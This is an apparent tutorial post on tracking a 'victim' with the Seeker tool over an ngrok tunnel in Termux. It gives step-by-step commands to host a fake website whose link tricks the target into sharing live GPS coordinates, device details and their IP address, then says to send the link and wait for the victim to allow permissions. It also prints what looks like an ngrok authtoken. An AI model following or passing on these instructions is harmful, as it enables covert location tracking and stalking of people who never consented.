Get Victim Live Location By Link | Social Engineering | Termux Tool | Seeker | Ngrok

We will use tool SEEKER in this tutorial to get victim ip address , geo location , latitude & longitude etc...

Seeker Hosts a fake website on In Built PHP Server and uses Serveo to generate a link which we will forward to the target, website asks for Location Permission and if the target allows it, we can get :
Longitude
Latitude
Accuracy
Altitude - Not always available
Direction - Only available if user is moving
Speed - Only available if user is moving

Along with Location Information we also get Device Information without any permissions :
Operating System
Platform
Number of CPU Cores
Amount of RAM - Approximate Results
Screen Resolution
GPU information
Browser Name and Version
Public IP Address
IP Address Reconnaissance

Requirements :- 
- Use Mobile Data
- Termux Application
- Any Browser
- Personal Mobile Hotspot

This Tutorial Contain 2 Parts 
- Setup Ngrok
- Setup Seeker 

Lets Begin .....
Part 1 - Setup Ngrok

-- Downlod Ngrok & Unzip
- Login/Signup
- Go HERE (Keep this open in background)
- Click on Linux(ARM) 
- File of 12.49MB will start downloading.
- Go To You Download Folder 
- Unzip ngrok-stable-linux-arm.zip

-- Move ngrok to Termux Home Directory
- Open Termux 
- Find Ngrok Location In your phone by Termux
In my case ⬇️⬇️⬇️
   ls
   cd storage
   ls
   cd downloads
   ls
   cd ngrok-stable-linux-arm
   ls
- Now Ngrok file is displayed
- Now move it to termux home directory by
   mv -v ngrok /$HOME
- Exit that session and open new session 
- Type 
   ls
   chmod +x ngrok
- Turn On your mobile hotspot 

-- Connect Account 
- Go to ngrok download website (given in Step 1 Line 3)
- Copy your authtoken and paste it in termux 
- It look like this in my case ⬇️⬇️⬇️
./ngrok authtoken 1lah9CjMC4VXp89tsjkakalVas_2DMV6WiYSapDFG1FiyrDK 
- Type command 
   ./ngrok http 8080

Part 2 - Setup Seeker 

-- Clone Seeker
- Open new session and type these commands 
$ pkg update -y
$ pkg upgrade -y
$ pkg install git -y
$ pkg install php -y
$ pkg install curl -y
$ pkg install python -y
$ pkg install python3 -y
$ pkg install openssh -y
$ ls
$ cd seeker
$ ls
$ bash install.sh
$ ls
$ python3 seeker.py -t manual

-- Use Seeker 
- Select 1st option by entering 0 
- Now Go to Ngrok session
- Copy the last link 
It look like this in my case ⬇️⬇️⬇️
https://6e9dj80bddc8.ngrok.io
- Send that link to victim and wait untill he open link and allow permissions


Join out telegram group for more such tutorials :- Cyber Warrior


Seeker Result (some sensitive information was erased in screenshot below) :-